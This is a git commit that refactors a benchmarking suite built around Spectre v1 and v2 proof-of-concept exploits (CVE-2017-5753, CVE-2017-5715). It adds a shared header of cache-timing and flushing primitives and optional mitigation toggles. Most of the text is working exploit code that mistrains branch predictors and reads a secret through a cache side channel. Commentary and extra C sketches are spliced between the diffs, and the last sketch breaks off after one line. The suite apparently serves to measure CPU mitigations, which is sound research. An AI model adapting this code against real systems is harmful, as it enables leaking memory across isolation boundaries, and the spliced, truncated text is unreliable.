Final touch: style and tabulations.

Samuel Aubertin 2022-01-28 16:33:17 +01:00
parent 64f0c6b318
commit 47946f6aed
4 changed files with 400 additions and 614 deletions

Makefile

@@ -34,11 +34,11 @@ LDFLAGS= -fuse-ld=lld
 CCS= clang gcc
 OPTIMIZATIONS= 0 1 2 3 fast s
 RETPOLINE= mretpoline
-UUID:= $(shell uuid)
+UUID:= $(shell uuid || uuidgen)
 RESULTS_FILE:= results-$(UUID).json
 SSH_KEY= octoupload
 TIMES= 3
-FLAGS= -j
+OCTOFLAGS= -j
 
 ### Octopus internals
 CPU:= $(shell LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}')
@@ -148,7 +148,7 @@ $(RESULTS_FILE): build
 	for p in $(PROGS); do \
 		for t in $$(seq $(TIMES)); do \
 			sleep 0.1; \
-			(taskset 01 ./$$p $(FLAGS) || printf "{ \"$$p\": false }")>> $@; \
+			(taskset 01 ./$$p $(OCTOFLAGS) || printf "{ \"$$p\": false }")>> $@; \
			if ! [ "$$p" = "$(lastword $(PROGS))" ]; \
			then echo ',' >> $@; \
			else if ! [ $$t -eq $(TIMES) ]; \

octopus.h (new file, 144 lines)

@@ -0,0 +1,144 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h>
#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY (42 + 42)
#else
#ifndef NOMFENCE
#define LATENCY (18 + 18)
#else
#define LATENCY 0 /* assumed fallback so pre-SSE2 builds compile; uncalibrated */
#endif
#endif
#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
*
* array_index_mask_nospec() - generate a mask that is ~0UL when the
* bounds check succeeds and 0 otherwise
* @index: array element index
* @size: number of elements in array
*
* Returns:
* 0 - (index < size)
*/
static inline unsigned long
array_index_mask_nospec(unsigned long index, unsigned long size)
{
	unsigned long mask;
	__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
			:"=r" (mask)
			:"g"(size),"r" (index)
			:"cc");
	return mask;
}
#endif //MASKING_MITIGATION
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void
flush_memory_sse(uint8_t* addr)
{
	float* p = (float *)addr;
	float c = 0.f;
	__m128 i = _mm_setr_ps(c, c, c, c);
	int k, l;
	/* Non-sequential memory addressing by looping through k by l */
	for (k = 0; k < 4; k++)
		for (l = 0; l < 4; l++)
			_mm_stream_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
static inline unsigned
timed_access(volatile uint8_t *addr)
{
	uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
	unsigned int junk = junk;
#ifndef NORDTSCP
	t0 = __rdtscp(&junk);
	junk |= *addr;
	t1 = __rdtscp(&junk);
#else
#ifndef NOMFENCE
	/*
	Since the rdtsc instruction isn't serialized, newer processors will try to
	reorder it, ruining its value as a timing mechanism.
	To get around this, we use the mfence instruction to introduce a memory
	barrier and force serialization. mfence is used because it is portable across
	Intel and AMD.
	*/
	_mm_mfence();
	t0 = __rdtsc();
	_mm_mfence();
	junk = *addr;
	_mm_mfence();
	t1 = __rdtsc();
	_mm_mfence();
#else
	/*
	The mfence instruction was introduced with the SSE2 instruction set, so
	we have to ifdef it out on pre-SSE2 processors.
	Luckily, these older processors don't seem to reorder the rdtsc instruction,
	so not having mfence on older processors is less of an issue.
	*/
	t0 = __rdtsc();
	junk |= *addr;
	t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
	return (unsigned)(t1 - t0 - LATENCY);
}
static void
calibrate_threshold(unsigned int *threshold)
{
	volatile char buf[2 * CACHELINE_SIZE];
	volatile uint8_t* bufp;
	int i;
	const int cnt = 10000;
	uint64_t tcache = 0;
	__attribute__((unused))
	volatile int junk = 0;
	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1)));
	junk |= *bufp;
	for (i = 0, tcache = 0; i < cnt; i++) {
		tcache += timed_access(bufp);
	}
	tcache = tcache / cnt;
	if (threshold != NULL) {
		*threshold = tcache + LATENCY;
	}
	return;
}
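
A note on the primitives this header exports: timed_access() returns the cycle count for a single load of *addr, and calibrate_threshold() averages 10,000 timed loads of a line that is guaranteed cached, so anything markedly slower than its result can be treated as a miss. A minimal harness showing the intended usage (this test program is our own sketch, not part of the commit; it assumes a clflush-capable CPU):

/* threshold_check.c - hypothetical usage sketch for octopus.h:
 * time one cached ("hot") load and one flushed ("cold") load and
 * verify they fall on opposite sides of the calibrated threshold. */
#include "octopus.h"

static uint8_t probe[4 * CACHELINE_SIZE];

int
main(void)
{
	unsigned threshold, hot, cold;
	volatile uint8_t* p = &probe[CACHELINE_SIZE]; /* a line inside the buffer */

	calibrate_threshold(&threshold); /* mean hit latency, plus LATENCY margin */
	*p = 1;                          /* touch the line so it is cached */
	hot = timed_access(p);
#ifndef NOCLFLUSH
	_mm_clflush((const void *)p);    /* evict the line */
	_mm_mfence();                    /* make sure the flush completed */
#endif
	cold = timed_access(p);          /* miss: should exceed the threshold */
	printf("threshold %u, hot %u, cold %u\n", threshold, hot, cold);
	return !(hot <= threshold && threshold < cold);
}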

Spectre v1 PoC (CVE-2017-5753)

@@ -19,332 +19,148 @@
  * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
  */
-#include <stdio.h>
-#include <stdlib.h>
-#include <stdint.h>
-#include <getopt.h>
-#include <string.h>
-#include <x86intrin.h> /* for rdtscp and clflush */
-#if defined(__i386__) || defined(__amd64__)
-#define CACHELINE_SIZE 64
-#else
-#error "unsupported architecture"
-#endif
+#include "octopus.h"
-#if defined(__SSE__) && !defined(__SSE2__)
-#define NOSSE2
-#endif
-#ifdef NOSSE2
-#define NORDTSCP
-#define NOMFENCE
-#define NOCLFLUSH
-#endif //NOSSE2
-#ifndef NORDTSCP
-#define LATENCY 42 + 42
-#else
-#ifndef NOMFENCE
-#define LATENCY 18 + 18
-#endif
-#endif
-#ifdef MASKING_MITIGATION
-/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
- *
- * array_index_mask_nospec() - generate a mask that is ~0UL when the
- * bounds check succeeds and 0 otherwise
- * @index: array element index
- * @size: number of elements in array
- *
- * Returns:
- *     0 - (index < size)
- */
-static inline unsigned long
-array_index_mask_nospec(
-	unsigned long index,
-	unsigned long size
-)
-{
-	unsigned long mask;
-	__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
-			:"=r" (mask)
-			:"g"(size),"r" (index)
-			:"cc");
-	return mask;
-}
-#endif //MASKING_MITIGATION
-#ifdef NOCLFLUSH
-#define CACHE_FLUSH_ITERATIONS 2048
-#define CACHE_FLUSH_STRIDE 4096
-uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
-/* Flush memory using long SSE instructions */
-void
-flush_memory_sse(
-	uint8_t * addr
-)
-{
-	float * p = (float *)addr;
-	float c = 0.f;
-	__m128 i = _mm_setr_ps(c, c, c, c);
-	int k, l;
-	/* Non-sequential memory addressing by looping through k by l */
-	for (k = 0; k < 4; k++)
-		for (l = 0; l < 4; l++)
-			_mm_stream_ps(&p[(l * 4 + k) * 4], i);
-}
-#endif //NOCLFLUSH
-char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
-unsigned int array1_size = 16;
-uint8_t unused1[64];
-uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
-uint8_t unused2[64];
-uint8_t array2[256 * 512];
-uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
-unsigned cache_hit_threshold;
+char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
+unsigned int cache_hit_threshold, array1_size = 16;
+uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
+uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
-static inline unsigned
-timed_access(
-	volatile uint8_t *addr
-)
-{
-	uint64_t t0, t1;
-#pragma GCC diagnostic ignored "-Wuninitialized"
-	unsigned int junk = junk;
-#ifndef NORDTSCP
-	t0 = __rdtscp(& junk);
-	junk |= *addr;
-	t1 = __rdtscp(& junk);
-#else
-#ifndef NOMFENCE
-	/*
-	Since the rdtsc instruction isn't serialized, newer processors will try to
-	reorder it, ruining its value as a timing mechanism.
-	To get around this, we use the mfence instruction to introduce a memory
-	barrier and force serialization. mfence is used because it is portable across
-	Intel and AMD.
-	*/
-	_mm_mfence();
-	t0 = __rdtsc();
-	_mm_mfence();
-	junk = * addr;
-	_mm_mfence();
-	t1 = __rdtsc();
-	_mm_mfence();
-#else
-	/*
-	The mfence instruction was introduced with the SSE2 instruction set, so
-	we have to ifdef it out on pre-SSE2 processors.
-	Luckily, these older processors don't seem to reorder the rdtsc instruction,
-	so not having mfence on older processors is less of an issue.
-	*/
-	t0 = __rdtsc();
-	junk |= *addr;
-	t1 = __rdtsc();
-#endif // NOMFENCE
-#endif // NORDTSCP
-	return (unsigned)(t1 - t0 - LATENCY);
-}
-static void
-calibrate_threshold(
-	unsigned int *threshold
-)
-{
-	volatile char buf[2 * CACHELINE_SIZE];
-	volatile uint8_t *bufp;
-	int i;
-	const int cnt = 10000;
-	uint64_t tcache = 0;
-	__attribute__((unused))
-	volatile int junk = 0;
-	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
-		~(CACHELINE_SIZE - 1)));
-	junk |= *bufp;
-	for (i = 0, tcache = 0; i < cnt; i++) {
-		tcache += timed_access(bufp);
-	}
-	tcache = tcache / cnt;
-	if (threshold != NULL) {
-		*threshold = tcache + LATENCY;
-	}
-	return;
-}
 void
-victim_function(
-	size_t x
-)
+victim_function(size_t x)
 {
 	if (x < array1_size) {
 #ifdef LFENCE_MITIGATION
 		/*
 		 * According to Intel et al, the best way to mitigate this is to
 		 * add a serializing instruction after the boundary check to force
 		 * the retirement of previous instructions before proceeding to
 		 * the read.
 		 * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
 		 */
 		_mm_lfence();
 #endif
 #ifdef MASKING_MITIGATION
 		x &= array_index_mask_nospec(x, array1_size);
 #endif
 		temp &= array2[array1[x] * 512];
 	}
 }
 void
-leak(
-	size_t malicious_x,
-	uint8_t value[2],
-	int score[2],
-	unsigned cache_hit_threshold
-)
+leak(size_t malicious_x, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
 {
 	static int results[256];
-	int tries, i, j, mix_i;
-	unsigned int junk = 0;
-	size_t training_x, x;
-	volatile uint8_t *addr;
+	int tries, i, j, mix_i, junk = 0;
+	size_t training_x, x;
+	volatile uint8_t* addr;
 #ifdef NOCLFLUSH
 	int junk2 = 0;
 	int l;
 	(void)junk2;
 #endif
 	for (i = 0; i < 256; i++) {
 		results[i] = 0;
 	}
 	for (tries = 999; tries > 0; tries--) {
 #ifndef NOCLFLUSH
 		/* Flush array2[256*(0..255)] from cache */
 		for (i = 0; i < 256; i++)
 			_mm_clflush(&array2[i * 512]);
 #else
 		/* Flush array2[256*(0..255)] from cache
 		   using long SSE instruction several times */
 		for (j = 0; j < 16; j++) {
 			for (i = 0; i < 256; i++) {
 				flush_memory_sse(&array2[i * 512]);
 			}
 		}
 #endif
 		/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
 		training_x = tries % array1_size;
 		for (j = 29; j >= 0; j--) {
 #ifndef NOCLFLUSH
 			_mm_clflush(&array1_size);
 #else
 			/* Alternative to using clflush to flush the CPU cache
 			 * Read addresses at 4096-byte intervals out of a large array.
 			 * Do this around 2000 times, or more depending on CPU cache size. */
 			for (l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l -= CACHE_FLUSH_STRIDE) {
 				junk2 = cache_flush_array[l];
 			}
 #endif
 			for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
 			/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
 			/* Avoid jumps in case those tip off the branch predictor */
 			x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
 			x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
 			x = training_x ^ (x & (malicious_x ^ training_x));
 			/* Call the victim! */
 			victim_function(x);
 		}
 		/* Time reads. Order is lightly mixed up to prevent stride prediction */
 		for (i = 0; i < 256; i++) {
 			mix_i = ((i * 167) + 13) & 255;
 			addr = &array2[mix_i * 512];
 			if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
 				results[mix_i]++; /* cache hit - add +1 to score for this value */
 		}
 		/* Locate highest results in j */
 		j = -1;
 		for (i = 0; i < 256; i++) {
 			if (j < 0 || results[i] >= results[j]) {
 				j = i;
 			}
 		}
 		if (results[j] >= 3)
 			break;
 	}
 	results[0] ^= junk; /* use junk so code above won't get optimized out */
 	value[0] = (uint8_t) j;
 	score[0] = results[j];
 }

 int
-main(
-	int argc,
-	char** argv
-)
+main(int argc, char** argv)
 {
-	int o;
 	size_t malicious_x = (size_t)(secret - (char *) array1); /* default for malicious_x */
-	int i, score[2], len = (int)strlen(secret);
+	int i, o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
 	uint8_t value[2];
-	unsigned successes = 0;
-	int json = 0;
 	while ((o = getopt(argc, argv, "t:j")) != EOF) {
 		switch (o) {
 		case 't':
 			cache_hit_threshold = atoi(optarg);
 			break;
 		case 'j':
 			json++;
 			break;
 		default:
 usage:
 			fprintf(stderr, "usage: %s [-j] "
 				"[-t threshold]\n"
 				"\t-j\t\tJSON output\n"
 				"\t-t INT\t\tfixed threshold\n", argv[0]);
 			return 1;
 		}
 	}
-	if (argc != optind)
+	if (argc != optind) {
 		goto usage;
+	}
-	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ",
-		argv[0] + 2,
-		(int)strlen(secret));
+	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", argv[0] + 2, (int)strlen(secret));
 	calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
 #ifdef NOCLFLUSH
 	for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
 		cache_flush_array[i] = 1;
 	}
 #endif
-	for (i = 0; i < (int)sizeof(array2); i++)
+	for (i = 0; i < (int)sizeof(array2); i++) {
 		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
+	}
 	while (--len >= 0) {
 		leak(malicious_x++, value, score, cache_hit_threshold);
 		if (score[0] == 3 && value[0] > 31 && value[0] < 127) {
@@ -358,57 +174,54 @@ main(
 	if (json) {
 		printf("{ \"%s\": { \"capacities\": { ", argv[0] + 2);
 #ifndef NORDTSCP
 		printf("\"rdtscp\": true, ");
 #else
 		printf("\"rdtscp\": false, ");
 #endif
 #ifndef NOMFENCE
 		printf("\"mfence\": true, ");
 #else
 		printf("\"mfence\": false, ");
 #endif
 #ifndef NOCLFLUSH
 		printf("\"clflush\": true ");
 #else
 		printf("\"clflush\": false ");
 #endif
 		printf("}, \"mitigations\": { ");
 #ifdef LFENCE_MITIGATION
 		printf("\"lfence\": true, ");
 #else
 		printf("\"lfence\": false, ");
 #endif
 #ifdef MASKING_MITIGATION
 		printf("\"masking\": true ");
 #else
 		printf("\"masking\": false ");
 #endif
 		printf("}, ");
 		printf("\"threshold\": %d, ", cache_hit_threshold);
-		printf("\"success\": %.0f } }",
-			100 * successes / (float)strlen(secret));
+		printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
 	}
 	fprintf(stderr, "[+] %-27s\t", argv[0] + 2);
 #ifndef NORDTSCP
 	fprintf(stderr, "RDTSCP ");
 #else
 	fprintf(stderr, "RDTSC ");
 #endif
 #ifndef NOMFENCE
 	fprintf(stderr, "MFENCE ");
 #endif
 #ifndef NOCLFLUSH
 	fprintf(stderr, "CLFLUSH ");
 #endif
 #ifdef LFENCE_MITIGATION
 	fprintf(stderr, "LFENCE_MITIGATION ");
 #endif
 #ifdef MASKING_MITIGATION
 	fprintf(stderr, "MASKING_MITIGATION ");
 #endif
-	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n",
-		cache_hit_threshold,
-		100 * successes / (float)strlen(secret));
+	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
 	return 0;
 }
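
The bit twiddling in the training loop above is what keeps the attack free of conditional branches: (j % 6) - 1 is -1 exactly when j % 6 == 0, the AND/OR pair smears that into an all-ones mask, and the final XOR selects malicious_x under that mask. A standalone illustration (our own sketch, not part of the commit; assumes the usual two's-complement, 64-bit size_t):

/* select_demo.c - demonstrates the branch-free select used by leak():
 * x becomes malicious_x on every sixth iteration and training_x
 * otherwise, with no data-dependent jump for the predictor to see. */
#include <stdio.h>
#include <stddef.h>

int
main(void)
{
	size_t training_x = 3, malicious_x = 1234, x;
	int j;

	for (j = 29; j >= 0; j--) {
		x = ((j % 6) - 1) & ~0xFFFF; /* 0xFFF...F0000 if j%6==0, else 0 */
		x = (x | (x >> 16));         /* all ones if j%6==0, else 0 */
		x = training_x ^ (x & (malicious_x ^ training_x));
		printf("j=%2d  x=%4zu  (%s)\n", j, x,
		    x == malicious_x ? "attack" : "train");
	}
	return 0;
}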

Spectre v2 PoC (CVE-2017-5715)

@@ -18,83 +18,20 @@
  * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
  */
-#include <stdio.h>
-#include <stdlib.h>
-#include <stdint.h>
-#include <getopt.h>
-#include <string.h>
-#include <x86intrin.h> /* for rdtscp and clflush */
-#if defined(__i386__) || defined(__amd64__)
-#define CACHELINE_SIZE 64
-#else
-#error "unsupported architecture"
-#endif
-#if defined(__SSE__) && !defined(__SSE2__)
-#define NOSSE2
-#endif
-#ifdef NOSSE2
-#define NORDTSCP
-#define NOMFENCE
-#define NOCLFLUSH
-#endif //NOSSE2
-#ifndef NORDTSCP
-#define LATENCY 42 + 42
-#else
-#ifndef NOMFENCE
-#define LATENCY 18 + 18
-#endif
-#endif
+#include "octopus.h"
+
 #define GAP 1024
-#ifdef NOCLFLUSH
-#define CACHE_FLUSH_ITERATIONS 2048
-#define CACHE_FLUSH_STRIDE 4096
-uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
-/* Flush memory using long SSE instructions */
-void
-flush_memory_sse(
-	uint8_t * addr
-)
-{
-	float * p = (float *)addr;
-	float c = 0.f;
-	__m128 i = _mm_setr_ps(c, c, c, c);
-	int k, l;
-	/* Non-sequential memory addressing by looping through k by l */
-	for (k = 0; k < 4; k++)
-		for (l = 0; l < 4; l++)
-			_mm_stream_ps(&p[(l * 4 + k) * 4], i);
-}
-#endif //NOCLFLUSH
 char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
-uint8_t channel[256 * GAP]; // side channel to extract secret phrase
-uint64_t *target; // pointer to indirect call target
-unsigned int array1_size = 16;
-uint8_t unused1[64];
-uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
-uint8_t unused2[64];
-uint8_t array2[256 * 512];
-uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
-unsigned cache_hit_threshold;
+uint64_t* target; // pointer to indirect call target
+unsigned int cache_hit_threshold, array1_size = 16;
+uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
+uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
+uint8_t channel[256 * GAP]; // side channel to extract secret phrase
 
 // mistrained target of indirect call
 int
-gadget(
-	char *addr
-)
+gadget(char* addr)
 {
 	return channel[*addr * GAP]; // speculative loads fetch data into the cache
 }
@@ -106,89 +43,13 @@ safe_target()
 	return 42;
 }
-static inline unsigned
-timed_access(
-	volatile uint8_t *addr
-)
-{
-	uint64_t t0, t1;
-#pragma GCC diagnostic ignored "-Wuninitialized"
-	unsigned int junk;
-#ifndef NORDTSCP
-	t0 = __rdtscp(& junk);
-	junk |= *addr;
-	t1 = __rdtscp(& junk);
-#else
-#ifndef NOMFENCE
-	/*
-	Since the rdtsc instruction isn't serialized, newer processors will try to
-	reorder it, ruining its value as a timing mechanism.
-	To get around this, we use the mfence instruction to introduce a memory
-	barrier and force serialization. mfence is used because it is portable across
-	Intel and AMD.
-	*/
-	_mm_mfence();
-	t0 = __rdtsc();
-	_mm_mfence();
-	junk = * addr;
-	_mm_mfence();
-	t1 = __rdtsc();
-	_mm_mfence();
-#else
-	/*
-	The mfence instruction was introduced with the SSE2 instruction set, so
-	we have to ifdef it out on pre-SSE2 processors.
-	Luckily, these older processors don't seem to reorder the rdtsc instruction,
-	so not having mfence on older processors is less of an issue.
-	*/
-	t0 = __rdtsc();
-	junk |= *addr;
-	t1 = __rdtsc();
-#endif // NOMFENCE
-#endif // NORDTSCP
-	return (unsigned)(t1 - t0 - LATENCY);
-}
-static void
-calibrate_threshold(
-	unsigned int *threshold
-)
-{
-	volatile char buf[2 * CACHELINE_SIZE];
-	volatile uint8_t *bufp;
-	int i;
-	const int cnt = 10000;
-	uint64_t tcache = 0;
-	__attribute__((unused))
-	volatile int junk = 0;
-	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
-		~(CACHELINE_SIZE - 1)));
-	junk |= *bufp;
-	for (i = 0, tcache = 0; i < cnt; i++) {
-		tcache += timed_access(bufp);
-	}
-	tcache = tcache / cnt;
-	if (threshold != NULL) {
-		*threshold = tcache + LATENCY;
-	}
-	return;
-}
 // function that makes indirect call
 // note that addr will be passed to gadget via %rdi
 int
-victim_function(
-	char *addr,
-	int input
-)
+victim_function(char* addr, int input)
 {
 #pragma GCC diagnostic ignored "-Wuninitialized"
-	unsigned int junk = junk;
+	unsigned int result, junk = junk;
 	// set up branch history buffer (bhb) by performing >29 taken branches
 	// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
 	// for details about how the branch prediction mechanism works
@@ -197,171 +58,142 @@ victim_function(
 		input += i;
 		junk += input & i;
 	}
-	int result;
 	// call *target
 	__asm volatile("callq *%1\n"
 		"mov %%eax, %0\n"
 		: "=r" (result)
 		: "r" (*target)
 		: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
 	return result & junk;
 }
 static inline void
-leak(
-	char *target_addr,
-	uint8_t value[2],
-	int score[2],
-	unsigned cache_hit_threshold
-)
+leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
 {
 	static int results[256];
 	int tries, i, j, mix_i;
 	unsigned int junk = 0;
-	volatile uint8_t *addr;
+	volatile uint8_t* addr;
 	char dummy = '@';
 #ifdef NOCLFLUSH
 	int junk2 = 0;
 	int l;
 	(void)junk2;
 #endif
 	for (i = 0; i < 256; i++) {
 		results[i] = 0;
 		channel[i * GAP] = 1;
 	}
 	for (tries = 999; tries > 0; tries--) {
 		*target = (uint64_t)&gadget;
 #ifndef NOMFENCE
 		_mm_mfence();
 #endif
 		for (j = 50; j > 0; j--) {
 			junk ^= victim_function(&dummy, 0);
 		}
 #ifndef NOMFENCE
 		_mm_mfence();
 #endif
 #ifndef NOCLFLUSH
-		for (i = 0; i < 256; i++)
+		for (i = 0; i < 256; i++) {
 			_mm_clflush(&channel[i * GAP]);
+		}
 #else
 		for (j = 0; j < 16; j++) {
 			for (i = 0; i < 256; i++) {
 				flush_memory_sse(&channel[i * GAP]);
 			}
 		}
 #endif
 #ifndef NOMFENCE
 		_mm_mfence();
 #endif
 		// change to safe target
 		*target = (uint64_t)&safe_target;
-#ifndef NOMFENCE
-		_mm_mfence();
-#endif
 #ifndef NOMFENCE
 		_mm_mfence();
 #endif
 		// flush target to prolong misprediction interval
 #ifndef NOCLFLUSH
 		_mm_clflush((void*) target);
 #else
+		flush_memory_sse((void*) target);
 #endif
 #ifndef NOMFENCE
 		_mm_mfence();
 #endif
 		// call victim
 		junk ^= victim_function(target_addr, 0);
 #ifndef NOMFENCE
 		_mm_mfence();
 #endif
 		// now, the value of *addr_to_read should be cached even though
 		// the logical execution path never calls gadget()
-
-		// time reads, mix up order to prevent stride prediction
-
 		/* Time reads. Order is lightly mixed up to prevent stride prediction */
 		for (i = 0; i < 256; i++) {
 			mix_i = ((i * 167) + 13) & 255;
 			addr = &channel[mix_i * GAP];
-			if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
+			if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {
 				results[mix_i]++; /* cache hit - add +1 to score for this value */
+			}
 		}
 		/* Locate highest results in j */
 		j = -1;
 		for (i = 0; i < 256; i++) {
 			if (j < 0 || results[i] >= results[j]) {
 				j = i;
 			}
 		}
-		if (results[j] >= 3)
-			break;
+		if (results[j] >= 3) {
+			break;
+		}
 	}
 	results[0] ^= junk; /* use junk so code above won't get optimized out */
 	value[0] = (uint8_t) j;
 	score[0] = results[j];
 }
 int
-main(
-	int argc,
-	char** argv
-)
+main(int argc, char** argv)
 {
-	target = (uint64_t*)malloc(sizeof(uint64_t));
-	int o;
-	//size_t malicious_x = (size_t)(secret - (char *) array1); /* default for malicious_x */
-	int score[2], len = (int)strlen(secret);
-	uint8_t value[2];
-	unsigned successes = 0;
-	int json = 0;
-	char *addr = secret;
+	int i, o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
+	uint8_t value[2];
+	char* addr = secret;
 	while ((o = getopt(argc, argv, "t:j")) != EOF) {
 		switch (o) {
 		case 't':
 			cache_hit_threshold = atoi(optarg);
 			break;
 		case 'j':
 			json++;
 			break;
 		default:
 usage:
 			fprintf(stderr, "usage: %s [-j] "
 				"[-t threshold]\n"
 				"\t-j\t\tJSON output\n"
 				"\t-t INT\t\tfixed threshold\n", argv[0]);
 			return 1;
 		}
 	}
-	if (argc != optind)
+	if (argc != optind) {
 		goto usage;
+	}
-	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ",
-		argv[0] + 2,
-		len);
+	target = (uint64_t*)malloc(sizeof(uint64_t));
+	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len);
 	calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
 #ifdef NOCLFLUSH
 	for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
 		cache_flush_array[i] = 1;
 	}
 #endif
-	//for (i = 0; i < (int)sizeof(array2); i++)
-	//	array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
 	while (--len >= 0) {
 		leak(addr++, value, score, cache_hit_threshold);
 		if (score[0] == 3 && value[0] > 31 && value[0] < 127) {
@@ -375,40 +207,37 @@ main(
 	if (json) {
 		printf("{ \"%s\": { \"capacities\": { ", argv[0] + 2);
 #ifndef NORDTSCP
 		printf("\"rdtscp\": true, ");
 #else
 		printf("\"rdtscp\": false, ");
 #endif
 #ifndef NOMFENCE
 		printf("\"mfence\": true, ");
 #else
 		printf("\"mfence\": false, ");
 #endif
 #ifndef NOCLFLUSH
 		printf("\"clflush\": true ");
 #else
 		printf("\"clflush\": false ");
 #endif
 		printf("}, ");
 		printf("\"threshold\": %d, ", cache_hit_threshold);
-		printf("\"success\": %.0f } }",
-			100 * successes / (float)strlen(secret));
+		printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
 	}
 	fprintf(stderr, "[+] %-27s\t", argv[0] + 2);
 #ifndef NORDTSCP
 	fprintf(stderr, "RDTSCP ");
 #else
 	fprintf(stderr, "RDTSC ");
 #endif
 #ifndef NOMFENCE
 	fprintf(stderr, "MFENCE ");
 #endif
 #ifndef NOCLFLUSH
 	fprintf(stderr, "CLFLUSH ");
 #endif
-	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n",
-		cache_hit_threshold,
-		100 * successes / (float)strlen(secret));
+	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
 	free(target);
 	return 0;
 }
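
For contrast with the bounds-check variant above, this second PoC mistrains the branch target buffer rather than the direction predictor: the loop that calls victim_function(&dummy, 0) while *target == &gadget teaches the indirect call site to predict gadget(), so that after *target is rewritten to &safe_target (and flushed, to widen the misprediction window) the speculative call still lands in gadget() and leaves *addr's value in the cache. The skeleton of that idea, stripped of all timing machinery (our own sketch, not from the commit; the -mretpoline remark reflects clang's documented behaviour of replacing indirect branches with return trampolines, which is why the Makefile builds a mretpoline variant of each program):

/* btb_demo.c - shape of the indirect-call mistraining pattern.
 * On a vulnerable core, the trained call site may transiently run
 * the old target after the pointer changes; compiled with
 * -mretpoline the indirect call never consults the BTB at all. */
#include <stdio.h>

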